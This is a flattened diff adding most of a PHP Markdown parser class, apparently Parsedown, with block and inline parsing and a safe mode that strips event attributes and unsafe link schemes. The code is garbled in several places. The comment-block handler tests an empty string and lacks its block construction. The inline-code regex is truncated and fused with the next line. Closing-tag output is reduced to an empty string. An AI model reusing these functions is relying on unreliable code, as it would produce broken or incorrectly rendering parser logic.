'block' . $CurrentBlock['type'] . 'Continue'; + $Block = $this->$methodName($Line, $CurrentBlock); + + if (isset($Block)) + { + $CurrentBlock = $Block; + + continue; + } + else + { + if ($this->isBlockCompletable($CurrentBlock['type'])) + { + $methodName = 'block' . $CurrentBlock['type'] . 'Complete'; + $CurrentBlock = $this->$methodName($CurrentBlock); + } + } + } + + # ~ + + $marker = $text[0]; + + # ~ + + $blockTypes = $this->unmarkedBlockTypes; + + if (isset($this->BlockTypes[$marker])) + { + foreach ($this->BlockTypes[$marker] as $blockType) + { + $blockTypes []= $blockType; + } + } + + # + # ~ + + foreach ($blockTypes as $blockType) + { + $Block = $this->{"block$blockType"}($Line, $CurrentBlock); + + if (isset($Block)) + { + $Block['type'] = $blockType; + + if ( ! isset($Block['identified'])) + { + if (isset($CurrentBlock)) + { + $Elements[] = $this->extractElement($CurrentBlock); + } + + $Block['identified'] = true; + } + + if ($this->isBlockContinuable($blockType)) + { + $Block['continuable'] = true; + } + + $CurrentBlock = $Block; + + continue 2; + } + } + + # ~ + + if (isset($CurrentBlock) and $CurrentBlock['type'] === 'Paragraph') + { + $Block = $this->paragraphContinue($Line, $CurrentBlock); + } + + if (isset($Block)) + { + $CurrentBlock = $Block; + } + else + { + if (isset($CurrentBlock)) + { + $Elements[] = $this->extractElement($CurrentBlock); + } + + $CurrentBlock = $this->paragraph($Line); + + $CurrentBlock['identified'] = true; + } + } + + # ~ + + if (isset($CurrentBlock['continuable']) and $this->isBlockCompletable($CurrentBlock['type'])) + { + $methodName = 'block' . $CurrentBlock['type'] . 'Complete'; + $CurrentBlock = $this->$methodName($CurrentBlock); + } + + # ~ + + if (isset($CurrentBlock)) + { + $Elements[] = $this->extractElement($CurrentBlock); + } + + # ~ + + return $Elements; + } + + protected function extractElement(array $Component) + { + if ( ! isset($Component['element'])) + { + if (isset($Component['markup'])) + { + $Component['element'] = array('rawHtml' => $Component['markup']); + } + elseif (isset($Component['hidden'])) + { + $Component['element'] = array(); + } + } + + return $Component['element']; + } + + protected function isBlockContinuable($Type) + { + return method_exists($this, 'block' . $Type . 'Continue'); + } + + protected function isBlockCompletable($Type) + { + return method_exists($this, 'block' . $Type . 'Complete'); + } + + # + # Code + + protected function blockCode($Line, $Block = null) + { + if (isset($Block) and $Block['type'] === 'Paragraph' and ! isset($Block['interrupted'])) + { + return; + } + + if ($Line['indent'] >= 4) + { + $text = substr($Line['body'], 4); + + $Block = array( + 'element' => array( + 'name' => 'pre', + 'element' => array( + 'name' => 'code', + 'text' => $text, + ), + ), + ); + + return $Block; + } + } + + protected function blockCodeContinue($Line, $Block) + { + if ($Line['indent'] >= 4) + { + if (isset($Block['interrupted'])) + { + $Block['element']['element']['text'] .= str_repeat("\n", $Block['interrupted']); + + unset($Block['interrupted']); + } + + $Block['element']['element']['text'] .= "\n"; + + $text = substr($Line['body'], 4); + + $Block['element']['element']['text'] .= $text; + + return $Block; + } + } + + protected function blockCodeComplete($Block) + { + return $Block; + } + + # + # Comment + + protected function blockComment($Line) + { + if ($this->markupEscaped or $this->safeMode) + { + return; + } + + if (strpos($Line['text'], '') !== false) + { + $Block['closed'] = true; + } + + return $Block; + } + } + + protected function blockCommentContinue($Line, array $Block) + { + if (isset($Block['closed'])) + { + return; + } + + $Block['element']['rawHtml'] .= "\n" . $Line['body']; + + if (strpos($Line['text'], '-->') !== false) + { + $Block['closed'] = true; + } + + return $Block; + } + + # + # Fenced Code + + protected function blockFencedCode($Line) + { + $marker = $Line['text'][0]; + + $openerLength = strspn($Line['text'], $marker); + + if ($openerLength < 3) + { + return; + } + + $infostring = trim(substr($Line['text'], $openerLength), "\t "); + + if (strpos($infostring, '`') !== false) + { + return; + } + + $Element = array( + 'name' => 'code', + 'text' => '', + ); + + if ($infostring !== '') + { + /** + * https://www.w3.org/TR/2011/WD-html5-20110525/elements.html#classes + * Every HTML element may have a class attribute specified. + * The attribute, if specified, must have a value that is a set + * of space-separated tokens representing the various classes + * that the element belongs to. + * [...] + * The space characters, for the purposes of this specification, + * are U+0020 SPACE, U+0009 CHARACTER TABULATION (tab), + * U+000A LINE FEED (LF), U+000C FORM FEED (FF), and + * U+000D CARRIAGE RETURN (CR). + */ + $language = substr($infostring, 0, strcspn($infostring, " \t\n\f\r")); + + $Element['attributes'] = array('class' => "language-$language"); + } + + $Block = array( + 'char' => $marker, + 'openerLength' => $openerLength, + 'element' => array( + 'name' => 'pre', + 'element' => $Element, + ), + ); + + return $Block; + } + + protected function blockFencedCodeContinue($Line, $Block) + { + if (isset($Block['complete'])) + { + return; + } + + if (isset($Block['interrupted'])) + { + $Block['element']['element']['text'] .= str_repeat("\n", $Block['interrupted']); + + unset($Block['interrupted']); + } + + if (($len = strspn($Line['text'], $Block['char'])) >= $Block['openerLength'] + and chop(substr($Line['text'], $len), ' ') === '' + ) { + $Block['element']['element']['text'] = substr($Block['element']['element']['text'], 1); + + $Block['complete'] = true; + + return $Block; + } + + $Block['element']['element']['text'] .= "\n" . $Line['body']; + + return $Block; + } + + protected function blockFencedCodeComplete($Block) + { + return $Block; + } + + # + # Header + + protected function blockHeader($Line) + { + $level = strspn($Line['text'], '#'); + + if ($level > 6) + { + return; + } + + $text = trim($Line['text'], '#'); + + if ($this->strictMode and isset($text[0]) and $text[0] !== ' ') + { + return; + } + + $text = trim($text, ' '); + + $Block = array( + 'element' => array( + 'name' => 'h' . $level, + 'handler' => array( + 'function' => 'lineElements', + 'argument' => $text, + 'destination' => 'elements', + ) + ), + ); + + return $Block; + } + + # + # List + + protected function blockList($Line, array $CurrentBlock = null) + { + list($name, $pattern) = $Line['text'][0] <= '-' ? array('ul', '[*+-]') : array('ol', '[0-9]{1,9}+[.\)]'); + + if (preg_match('/^('.$pattern.'([ ]++|$))(.*+)/', $Line['text'], $matches)) + { + $contentIndent = strlen($matches[2]); + + if ($contentIndent >= 5) + { + $contentIndent -= 1; + $matches[1] = substr($matches[1], 0, -$contentIndent); + $matches[3] = str_repeat(' ', $contentIndent) . $matches[3]; + } + elseif ($contentIndent === 0) + { + $matches[1] .= ' '; + } + + $markerWithoutWhitespace = strstr($matches[1], ' ', true); + + $Block = array( + 'indent' => $Line['indent'], + 'pattern' => $pattern, + 'data' => array( + 'type' => $name, + 'marker' => $matches[1], + 'markerType' => ($name === 'ul' ? $markerWithoutWhitespace : substr($markerWithoutWhitespace, -1)), + ), + 'element' => array( + 'name' => $name, + 'elements' => array(), + ), + ); + $Block['data']['markerTypeRegex'] = preg_quote($Block['data']['markerType'], '/'); + + if ($name === 'ol') + { + $listStart = ltrim(strstr($matches[1], $Block['data']['markerType'], true), '0') ?: '0'; + + if ($listStart !== '1') + { + if ( + isset($CurrentBlock) + and $CurrentBlock['type'] === 'Paragraph' + and ! isset($CurrentBlock['interrupted']) + ) { + return; + } + + $Block['element']['attributes'] = array('start' => $listStart); + } + } + + $Block['li'] = array( + 'name' => 'li', + 'handler' => array( + 'function' => 'li', + 'argument' => !empty($matches[3]) ? array($matches[3]) : array(), + 'destination' => 'elements' + ) + ); + + $Block['element']['elements'] []= & $Block['li']; + + return $Block; + } + } + + protected function blockListContinue($Line, array $Block) + { + if (isset($Block['interrupted']) and empty($Block['li']['handler']['argument'])) + { + return null; + } + + $requiredIndent = ($Block['indent'] + strlen($Block['data']['marker'])); + + if ($Line['indent'] < $requiredIndent + and ( + ( + $Block['data']['type'] === 'ol' + and preg_match('/^[0-9]++'.$Block['data']['markerTypeRegex'].'(?:[ ]++(.*)|$)/', $Line['text'], $matches) + ) or ( + $Block['data']['type'] === 'ul' + and preg_match('/^'.$Block['data']['markerTypeRegex'].'(?:[ ]++(.*)|$)/', $Line['text'], $matches) + ) + ) + ) { + if (isset($Block['interrupted'])) + { + $Block['li']['handler']['argument'] []= ''; + + $Block['loose'] = true; + + unset($Block['interrupted']); + } + + unset($Block['li']); + + $text = isset($matches[1]) ? $matches[1] : ''; + + $Block['indent'] = $Line['indent']; + + $Block['li'] = array( + 'name' => 'li', + 'handler' => array( + 'function' => 'li', + 'argument' => array($text), + 'destination' => 'elements' + ) + ); + + $Block['element']['elements'] []= & $Block['li']; + + return $Block; + } + elseif ($Line['indent'] < $requiredIndent and $this->blockList($Line)) + { + return null; + } + + if ($Line['text'][0] === '[' and $this->blockReference($Line)) + { + return $Block; + } + + if ($Line['indent'] >= $requiredIndent) + { + if (isset($Block['interrupted'])) + { + $Block['li']['handler']['argument'] []= ''; + + $Block['loose'] = true; + + unset($Block['interrupted']); + } + + $text = substr($Line['body'], $requiredIndent); + + $Block['li']['handler']['argument'] []= $text; + + return $Block; + } + + if ( ! isset($Block['interrupted'])) + { + $text = preg_replace('/^[ ]{0,'.$requiredIndent.'}+/', '', $Line['body']); + + $Block['li']['handler']['argument'] []= $text; + + return $Block; + } + } + + protected function blockListComplete(array $Block) + { + if (isset($Block['loose'])) + { + foreach ($Block['element']['elements'] as &$li) + { + if (end($li['handler']['argument']) !== '') + { + $li['handler']['argument'] []= ''; + } + } + } + + return $Block; + } + + # + # Quote + + protected function blockQuote($Line) + { + if (preg_match('/^>[ ]?+(.*+)/', $Line['text'], $matches)) + { + $Block = array( + 'element' => array( + 'name' => 'blockquote', + 'handler' => array( + 'function' => 'linesElements', + 'argument' => (array) $matches[1], + 'destination' => 'elements', + ) + ), + ); + + return $Block; + } + } + + protected function blockQuoteContinue($Line, array $Block) + { + if (isset($Block['interrupted'])) + { + return; + } + + if ($Line['text'][0] === '>' and preg_match('/^>[ ]?+(.*+)/', $Line['text'], $matches)) + { + $Block['element']['handler']['argument'] []= $matches[1]; + + return $Block; + } + + if ( ! isset($Block['interrupted'])) + { + $Block['element']['handler']['argument'] []= $Line['text']; + + return $Block; + } + } + + # + # Rule + + protected function blockRule($Line) + { + $marker = $Line['text'][0]; + + if (substr_count($Line['text'], $marker) >= 3 and chop($Line['text'], " $marker") === '') + { + $Block = array( + 'element' => array( + 'name' => 'hr', + ), + ); + + return $Block; + } + } + + # + # Setext + + protected function blockSetextHeader($Line, array $Block = null) + { + if ( ! isset($Block) or $Block['type'] !== 'Paragraph' or isset($Block['interrupted'])) + { + return; + } + + if ($Line['indent'] < 4 and chop(chop($Line['text'], ' '), $Line['text'][0]) === '') + { + $Block['element']['name'] = $Line['text'][0] === '=' ? 'h1' : 'h2'; + + return $Block; + } + } + + # + # Markup + + protected function blockMarkup($Line) + { + if ($this->markupEscaped or $this->safeMode) + { + return; + } + + if (preg_match('/^<[\/]?+(\w*)(?:[ ]*+'.$this->regexHtmlAttribute.')*+[ ]*+(\/)?>/', $Line['text'], $matches)) + { + $element = strtolower($matches[1]); + + if (in_array($element, $this->textLevelElements)) + { + return; + } + + $Block = array( + 'name' => $matches[1], + 'element' => array( + 'rawHtml' => $Line['text'], + 'autobreak' => true, + ), + ); + + return $Block; + } + } + + protected function blockMarkupContinue($Line, array $Block) + { + if (isset($Block['closed']) or isset($Block['interrupted'])) + { + return; + } + + $Block['element']['rawHtml'] .= "\n" . $Line['body']; + + return $Block; + } + + # + # Reference + + protected function blockReference($Line) + { + if (strpos($Line['text'], ']') !== false + and preg_match('/^\[(.+?)\]:[ ]*+?(?:[ ]+["\'(](.+)["\')])?[ ]*+$/', $Line['text'], $matches) + ) { + $id = strtolower($matches[1]); + + $Data = array( + 'url' => $matches[2], + 'title' => isset($matches[3]) ? $matches[3] : null, + ); + + $this->DefinitionData['Reference'][$id] = $Data; + + $Block = array( + 'element' => array(), + ); + + return $Block; + } + } + + # + # Table + + protected function blockTable($Line, array $Block = null) + { + if ( ! isset($Block) or $Block['type'] !== 'Paragraph' or isset($Block['interrupted'])) + { + return; + } + + if ( + strpos($Block['element']['handler']['argument'], '|') === false + and strpos($Line['text'], '|') === false + and strpos($Line['text'], ':') === false + or strpos($Block['element']['handler']['argument'], "\n") !== false + ) { + return; + } + + if (chop($Line['text'], ' -:|') !== '') + { + return; + } + + $alignments = array(); + + $divider = $Line['text']; + + $divider = trim($divider); + $divider = trim($divider, '|'); + + $dividerCells = explode('|', $divider); + + foreach ($dividerCells as $dividerCell) + { + $dividerCell = trim($dividerCell); + + if ($dividerCell === '') + { + return; + } + + $alignment = null; + + if ($dividerCell[0] === ':') + { + $alignment = 'left'; + } + + if (substr($dividerCell, - 1) === ':') + { + $alignment = $alignment === 'left' ? 'center' : 'right'; + } + + $alignments []= $alignment; + } + + # ~ + + $HeaderElements = array(); + + $header = $Block['element']['handler']['argument']; + + $header = trim($header); + $header = trim($header, '|'); + + $headerCells = explode('|', $header); + + if (count($headerCells) !== count($alignments)) + { + return; + } + + foreach ($headerCells as $index => $headerCell) + { + $headerCell = trim($headerCell); + + $HeaderElement = array( + 'name' => 'th', + 'handler' => array( + 'function' => 'lineElements', + 'argument' => $headerCell, + 'destination' => 'elements', + ) + ); + + if (isset($alignments[$index])) + { + $alignment = $alignments[$index]; + + $HeaderElement['attributes'] = array( + 'style' => "text-align: $alignment;", + ); + } + + $HeaderElements []= $HeaderElement; + } + + # ~ + + $Block = array( + 'alignments' => $alignments, + 'identified' => true, + 'element' => array( + 'name' => 'table', + 'elements' => array(), + ), + ); + + $Block['element']['elements'] []= array( + 'name' => 'thead', + ); + + $Block['element']['elements'] []= array( + 'name' => 'tbody', + 'elements' => array(), + ); + + $Block['element']['elements'][0]['elements'] []= array( + 'name' => 'tr', + 'elements' => $HeaderElements, + ); + + return $Block; + } + + protected function blockTableContinue($Line, array $Block) + { + if (isset($Block['interrupted'])) + { + return; + } + + if (count($Block['alignments']) === 1 or $Line['text'][0] === '|' or strpos($Line['text'], '|')) + { + $Elements = array(); + + $row = $Line['text']; + + $row = trim($row); + $row = trim($row, '|'); + + preg_match_all('/(?:(\\\\[|])|[^|`]|`[^`]++`|`)++/', $row, $matches); + + $cells = array_slice($matches[0], 0, count($Block['alignments'])); + + foreach ($cells as $index => $cell) + { + $cell = trim($cell); + + $Element = array( + 'name' => 'td', + 'handler' => array( + 'function' => 'lineElements', + 'argument' => $cell, + 'destination' => 'elements', + ) + ); + + if (isset($Block['alignments'][$index])) + { + $Element['attributes'] = array( + 'style' => 'text-align: ' . $Block['alignments'][$index] . ';', + ); + } + + $Elements []= $Element; + } + + $Element = array( + 'name' => 'tr', + 'elements' => $Elements, + ); + + $Block['element']['elements'][1]['elements'] []= $Element; + + return $Block; + } + } + + # + # ~ + # + + protected function paragraph($Line) + { + return array( + 'type' => 'Paragraph', + 'element' => array( + 'name' => 'p', + 'handler' => array( + 'function' => 'lineElements', + 'argument' => $Line['text'], + 'destination' => 'elements', + ), + ), + ); + } + + protected function paragraphContinue($Line, array $Block) + { + if (isset($Block['interrupted'])) + { + return; + } + + $Block['element']['handler']['argument'] .= "\n".$Line['text']; + + return $Block; + } + + # + # Inline Elements + # + + protected $InlineTypes = array( + '!' => array('Image'), + '&' => array('SpecialCharacter'), + '*' => array('Emphasis'), + ':' => array('Url'), + '<' => array('UrlTag', 'EmailTag', 'Markup'), + '[' => array('Link'), + '_' => array('Emphasis'), + '`' => array('Code'), + '~' => array('Strikethrough'), + '\\' => array('EscapeSequence'), + ); + + # ~ + + protected $inlineMarkerList = '!*_&[:<`~\\'; + + # + # ~ + # + + public function line($text, $nonNestables = array()) + { + return $this->elements($this->lineElements($text, $nonNestables)); + } + + protected function lineElements($text, $nonNestables = array()) + { + # standardize line breaks + $text = str_replace(array("\r\n", "\r"), "\n", $text); + + $Elements = array(); + + $nonNestables = (empty($nonNestables) + ? array() + : array_combine($nonNestables, $nonNestables) + ); + + # $excerpt is based on the first occurrence of a marker + + while ($excerpt = strpbrk($text, $this->inlineMarkerList)) + { + $marker = $excerpt[0]; + + $markerPosition = strlen($text) - strlen($excerpt); + + $Excerpt = array('text' => $excerpt, 'context' => $text); + + foreach ($this->InlineTypes[$marker] as $inlineType) + { + # check to see if the current inline type is nestable in the current context + + if (isset($nonNestables[$inlineType])) + { + continue; + } + + $Inline = $this->{"inline$inlineType"}($Excerpt); + + if ( ! isset($Inline)) + { + continue; + } + + # makes sure that the inline belongs to "our" marker + + if (isset($Inline['position']) and $Inline['position'] > $markerPosition) + { + continue; + } + + # sets a default inline position + + if ( ! isset($Inline['position'])) + { + $Inline['position'] = $markerPosition; + } + + # cause the new element to 'inherit' our non nestables + + + $Inline['element']['nonNestables'] = isset($Inline['element']['nonNestables']) + ? array_merge($Inline['element']['nonNestables'], $nonNestables) + : $nonNestables + ; + + # the text that comes before the inline + $unmarkedText = substr($text, 0, $Inline['position']); + + # compile the unmarked text + $InlineText = $this->inlineText($unmarkedText); + $Elements[] = $InlineText['element']; + + # compile the inline + $Elements[] = $this->extractElement($Inline); + + # remove the examined text + $text = substr($text, $Inline['position'] + $Inline['extent']); + + continue 2; + } + + # the marker does not belong to an inline + + $unmarkedText = substr($text, 0, $markerPosition + 1); + + $InlineText = $this->inlineText($unmarkedText); + $Elements[] = $InlineText['element']; + + $text = substr($text, $markerPosition + 1); + } + + $InlineText = $this->inlineText($text); + $Elements[] = $InlineText['element']; + + foreach ($Elements as &$Element) + { + if ( ! isset($Element['autobreak'])) + { + $Element['autobreak'] = false; + } + } + + return $Elements; + } + + # + # ~ + # + + protected function inlineText($text) + { + $Inline = array( + 'extent' => strlen($text), + 'element' => array(), + ); + + $Inline['element']['elements'] = self::pregReplaceElements( + $this->breaksEnabled ? '/[ ]*+\n/' : '/(?:[ ]*+\\\\|[ ]{2,}+)\n/', + array( + array('name' => 'br'), + array('text' => "\n"), + ), + $text + ); + + return $Inline; + } + + protected function inlineCode($Excerpt) + { + $marker = $Excerpt['text'][0]; + + if (preg_match('/^(['.$marker.']++)[ ]*+(.+?)[ ]*+(? strlen($matches[0]), + 'element' => array( + 'name' => 'code', + 'text' => $text, + ), + ); + } + } + + protected function inlineEmailTag($Excerpt) + { + $hostnameLabel = '[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?'; + + $commonMarkEmail = '[a-zA-Z0-9.!#$%&\'*+\/=?^_`{|}~-]++@' + . $hostnameLabel . '(?:\.' . $hostnameLabel . ')*'; + + if (strpos($Excerpt['text'], '>') !== false + and preg_match("/^<((mailto:)?$commonMarkEmail)>/i", $Excerpt['text'], $matches) + ){ + $url = $matches[1]; + + if ( ! isset($matches[2])) + { + $url = "mailto:$url"; + } + + return array( + 'extent' => strlen($matches[0]), + 'element' => array( + 'name' => 'a', + 'text' => $matches[1], + 'attributes' => array( + 'href' => $url, + ), + ), + ); + } + } + + protected function inlineEmphasis($Excerpt) + { + if ( ! isset($Excerpt['text'][1])) + { + return; + } + + $marker = $Excerpt['text'][0]; + + if ($Excerpt['text'][1] === $marker and preg_match($this->StrongRegex[$marker], $Excerpt['text'], $matches)) + { + $emphasis = 'strong'; + } + elseif (preg_match($this->EmRegex[$marker], $Excerpt['text'], $matches)) + { + $emphasis = 'em'; + } + else + { + return; + } + + return array( + 'extent' => strlen($matches[0]), + 'element' => array( + 'name' => $emphasis, + 'handler' => array( + 'function' => 'lineElements', + 'argument' => $matches[1], + 'destination' => 'elements', + ) + ), + ); + } + + protected function inlineEscapeSequence($Excerpt) + { + if (isset($Excerpt['text'][1]) and in_array($Excerpt['text'][1], $this->specialCharacters)) + { + return array( + 'element' => array('rawHtml' => $Excerpt['text'][1]), + 'extent' => 2, + ); + } + } + + protected function inlineImage($Excerpt) + { + if ( ! isset($Excerpt['text'][1]) or $Excerpt['text'][1] !== '[') + { + return; + } + + $Excerpt['text']= substr($Excerpt['text'], 1); + + $Link = $this->inlineLink($Excerpt); + + if ($Link === null) + { + return; + } + + $Inline = array( + 'extent' => $Link['extent'] + 1, + 'element' => array( + 'name' => 'img', + 'attributes' => array( + 'src' => $Link['element']['attributes']['href'], + 'alt' => $Link['element']['handler']['argument'], + ), + 'autobreak' => true, + ), + ); + + $Inline['element']['attributes'] += $Link['element']['attributes']; + + unset($Inline['element']['attributes']['href']); + + return $Inline; + } + + protected function inlineLink($Excerpt) + { + $Element = array( + 'name' => 'a', + 'handler' => array( + 'function' => 'lineElements', + 'argument' => null, + 'destination' => 'elements', + ), + 'nonNestables' => array('Url', 'Link'), + 'attributes' => array( + 'href' => null, + 'title' => null, + ), + ); + + $extent = 0; + + $remainder = $Excerpt['text']; + + if (preg_match('/\[((?:[^][]++|(?R))*+)\]/', $remainder, $matches)) + { + $Element['handler']['argument'] = $matches[1]; + + $extent += strlen($matches[0]); + + $remainder = substr($remainder, $extent); + } + else + { + return; + } + + if (preg_match('/^[(]\s*+((?:[^ ()]++|[(][^ )]+[)])++)(?:[ ]+("[^"]*+"|\'[^\']*+\'))?\s*+[)]/', $remainder, $matches)) + { + $Element['attributes']['href'] = $matches[1]; + + if (isset($matches[2])) + { + $Element['attributes']['title'] = substr($matches[2], 1, - 1); + } + + $extent += strlen($matches[0]); + } + else + { + if (preg_match('/^\s*\[(.*?)\]/', $remainder, $matches)) + { + $definition = strlen($matches[1]) ? $matches[1] : $Element['handler']['argument']; + $definition = strtolower($definition); + + $extent += strlen($matches[0]); + } + else + { + $definition = strtolower($Element['handler']['argument']); + } + + if ( ! isset($this->DefinitionData['Reference'][$definition])) + { + return; + } + + $Definition = $this->DefinitionData['Reference'][$definition]; + + $Element['attributes']['href'] = $Definition['url']; + $Element['attributes']['title'] = $Definition['title']; + } + + return array( + 'extent' => $extent, + 'element' => $Element, + ); + } + + protected function inlineMarkup($Excerpt) + { + if ($this->markupEscaped or $this->safeMode or strpos($Excerpt['text'], '>') === false) + { + return; + } + + if ($Excerpt['text'][1] === '/' and preg_match('/^<\/\w[\w-]*+[ ]*+>/s', $Excerpt['text'], $matches)) + { + return array( + 'element' => array('rawHtml' => $matches[0]), + 'extent' => strlen($matches[0]), + ); + } + + if ($Excerpt['text'][1] === '!' and preg_match('/^/s', $Excerpt['text'], $matches)) + { + return array( + 'element' => array('rawHtml' => $matches[0]), + 'extent' => strlen($matches[0]), + ); + } + + if ($Excerpt['text'][1] !== ' ' and preg_match('/^<\w[\w-]*+(?:[ ]*+'.$this->regexHtmlAttribute.')*+[ ]*+\/?>/s', $Excerpt['text'], $matches)) + { + return array( + 'element' => array('rawHtml' => $matches[0]), + 'extent' => strlen($matches[0]), + ); + } + } + + protected function inlineSpecialCharacter($Excerpt) + { + if (substr($Excerpt['text'], 1, 1) !== ' ' and strpos($Excerpt['text'], ';') !== false + and preg_match('/^&(#?+[0-9a-zA-Z]++);/', $Excerpt['text'], $matches) + ) { + return array( + 'element' => array('rawHtml' => '&' . $matches[1] . ';'), + 'extent' => strlen($matches[0]), + ); + } + + return; + } + + protected function inlineStrikethrough($Excerpt) + { + if ( ! isset($Excerpt['text'][1])) + { + return; + } + + if ($Excerpt['text'][1] === '~' and preg_match('/^~~(?=\S)(.+?)(?<=\S)~~/', $Excerpt['text'], $matches)) + { + return array( + 'extent' => strlen($matches[0]), + 'element' => array( + 'name' => 'del', + 'handler' => array( + 'function' => 'lineElements', + 'argument' => $matches[1], + 'destination' => 'elements', + ) + ), + ); + } + } + + protected function inlineUrl($Excerpt) + { + if ($this->urlsLinked !== true or ! isset($Excerpt['text'][2]) or $Excerpt['text'][2] !== '/') + { + return; + } + + if (strpos($Excerpt['context'], 'http') !== false + and preg_match('/\bhttps?+:[\/]{2}[^\s<]+\b\/*+/ui', $Excerpt['context'], $matches, PREG_OFFSET_CAPTURE) + ) { + $url = $matches[0][0]; + + $Inline = array( + 'extent' => strlen($matches[0][0]), + 'position' => $matches[0][1], + 'element' => array( + 'name' => 'a', + 'text' => $url, + 'attributes' => array( + 'href' => $url, + ), + ), + ); + + return $Inline; + } + } + + protected function inlineUrlTag($Excerpt) + { + if (strpos($Excerpt['text'], '>') !== false and preg_match('/^<(\w++:\/{2}[^ >]++)>/i', $Excerpt['text'], $matches)) + { + $url = $matches[1]; + + return array( + 'extent' => strlen($matches[0]), + 'element' => array( + 'name' => 'a', + 'text' => $url, + 'attributes' => array( + 'href' => $url, + ), + ), + ); + } + } + + # ~ + + protected function unmarkedText($text) + { + $Inline = $this->inlineText($text); + return $this->element($Inline['element']); + } + + # + # Handlers + # + + protected function handle(array $Element) + { + if (isset($Element['handler'])) + { + if (!isset($Element['nonNestables'])) + { + $Element['nonNestables'] = array(); + } + + if (is_string($Element['handler'])) + { + $function = $Element['handler']; + $argument = $Element['text']; + unset($Element['text']); + $destination = 'rawHtml'; + } + else + { + $function = $Element['handler']['function']; + $argument = $Element['handler']['argument']; + $destination = $Element['handler']['destination']; + } + + $Element[$destination] = $this->{$function}($argument, $Element['nonNestables']); + + if ($destination === 'handler') + { + $Element = $this->handle($Element); + } + + unset($Element['handler']); + } + + return $Element; + } + + protected function handleElementRecursive(array $Element) + { + return $this->elementApplyRecursive(array($this, 'handle'), $Element); + } + + protected function handleElementsRecursive(array $Elements) + { + return $this->elementsApplyRecursive(array($this, 'handle'), $Elements); + } + + protected function elementApplyRecursive($closure, array $Element) + { + $Element = call_user_func($closure, $Element); + + if (isset($Element['elements'])) + { + $Element['elements'] = $this->elementsApplyRecursive($closure, $Element['elements']); + } + elseif (isset($Element['element'])) + { + $Element['element'] = $this->elementApplyRecursive($closure, $Element['element']); + } + + return $Element; + } + + protected function elementApplyRecursiveDepthFirst($closure, array $Element) + { + if (isset($Element['elements'])) + { + $Element['elements'] = $this->elementsApplyRecursiveDepthFirst($closure, $Element['elements']); + } + elseif (isset($Element['element'])) + { + $Element['element'] = $this->elementsApplyRecursiveDepthFirst($closure, $Element['element']); + } + + $Element = call_user_func($closure, $Element); + + return $Element; + } + + protected function elementsApplyRecursive($closure, array $Elements) + { + foreach ($Elements as &$Element) + { + $Element = $this->elementApplyRecursive($closure, $Element); + } + + return $Elements; + } + + protected function elementsApplyRecursiveDepthFirst($closure, array $Elements) + { + foreach ($Elements as &$Element) + { + $Element = $this->elementApplyRecursiveDepthFirst($closure, $Element); + } + + return $Elements; + } + + protected function element(array $Element) + { + if ($this->safeMode) + { + $Element = $this->sanitiseElement($Element); + } + + # identity map if element has no handler + $Element = $this->handle($Element); + + $hasName = isset($Element['name']); + + $markup = ''; + + if ($hasName) + { + $markup .= '<' . $Element['name']; + + if (isset($Element['attributes'])) + { + foreach ($Element['attributes'] as $name => $value) + { + if ($value === null) + { + continue; + } + + $markup .= " $name=\"".self::escape($value).'"'; + } + } + } + + $permitRawHtml = false; + + if (isset($Element['text'])) + { + $text = $Element['text']; + } + // very strongly consider an alternative if you're writing an + // extension + elseif (isset($Element['rawHtml'])) + { + $text = $Element['rawHtml']; + + $allowRawHtmlInSafeMode = isset($Element['allowRawHtmlInSafeMode']) && $Element['allowRawHtmlInSafeMode']; + $permitRawHtml = !$this->safeMode || $allowRawHtmlInSafeMode; + } + + $hasContent = isset($text) || isset($Element['element']) || isset($Element['elements']); + + if ($hasContent) + { + $markup .= $hasName ? '>' : ''; + + if (isset($Element['elements'])) + { + $markup .= $this->elements($Element['elements']); + } + elseif (isset($Element['element'])) + { + $markup .= $this->element($Element['element']); + } + else + { + if (!$permitRawHtml) + { + $markup .= self::escape($text, true); + } + else + { + $markup .= $text; + } + } + + $markup .= $hasName ? '' : ''; + } + elseif ($hasName) + { + $markup .= ' />'; + } + + return $markup; + } + + protected function elements(array $Elements) + { + $markup = ''; + + $autoBreak = true; + + foreach ($Elements as $Element) + { + if (empty($Element)) + { + continue; + } + + $autoBreakNext = (isset($Element['autobreak']) + ? $Element['autobreak'] : isset($Element['name']) + ); + // (autobreak === false) covers both sides of an element + $autoBreak = !$autoBreak ? $autoBreak : $autoBreakNext; + + $markup .= ($autoBreak ? "\n" : '') . $this->element($Element); + $autoBreak = $autoBreakNext; + } + + $markup .= $autoBreak ? "\n" : ''; + + return $markup; + } + + # ~ + + protected function li($lines) + { + $Elements = $this->linesElements($lines); + + if ( ! in_array('', $lines) + and isset($Elements[0]) and isset($Elements[0]['name']) + and $Elements[0]['name'] === 'p' + ) { + unset($Elements[0]['name']); + } + + return $Elements; + } + + # + # AST Convenience + # + + /** + * Replace occurrences $regexp with $Elements in $text. Return an array of + * elements representing the replacement. + */ + protected static function pregReplaceElements($regexp, $Elements, $text) + { + $newElements = array(); + + while (preg_match($regexp, $text, $matches, PREG_OFFSET_CAPTURE)) + { + $offset = $matches[0][1]; + $before = substr($text, 0, $offset); + $after = substr($text, $offset + strlen($matches[0][0])); + + $newElements[] = array('text' => $before); + + foreach ($Elements as $Element) + { + $newElements[] = $Element; + } + + $text = $after; + } + + $newElements[] = array('text' => $text); + + return $newElements; + } + + # + # Deprecated Methods + # + + function parse($text) + { + $markup = $this->text($text); + + return $markup; + } + + protected function sanitiseElement(array $Element) + { + static $goodAttribute = '/^[a-zA-Z0-9][a-zA-Z0-9-_]*+$/'; + static $safeUrlNameToAtt = array( + 'a' => 'href', + 'img' => 'src', + ); + + if ( ! isset($Element['name'])) + { + unset($Element['attributes']); + return $Element; + } + + if (isset($safeUrlNameToAtt[$Element['name']])) + { + $Element = $this->filterUnsafeUrlInAttribute($Element, $safeUrlNameToAtt[$Element['name']]); + } + + if ( ! empty($Element['attributes'])) + { + foreach ($Element['attributes'] as $att => $val) + { + # filter out badly parsed attribute + if ( ! preg_match($goodAttribute, $att)) + { + unset($Element['attributes'][$att]); + } + # dump onevent attribute + elseif (self::striAtStart($att, 'on')) + { + unset($Element['attributes'][$att]); + } + } + } + + return $Element; + } + + protected function filterUnsafeUrlInAttribute(array $Element, $attribute) + { + foreach ($this->safeLinksWhitelist as $scheme) + { + if (self::striAtStart($Element['attributes'][$attribute], $scheme)) + { + return $Element; + } + } + + $Element['attributes'][$attribute] = str_replace(':', '%3A', $Element['attributes'][$attribute]); + + return $Element; + } + + # + # Static Methods + # + + protected static function escape($text, $allowQuotes = false) + { + return htmlspecialchars($text, $allowQuotes ? ENT_NOQUOTES : ENT_QUOTES, 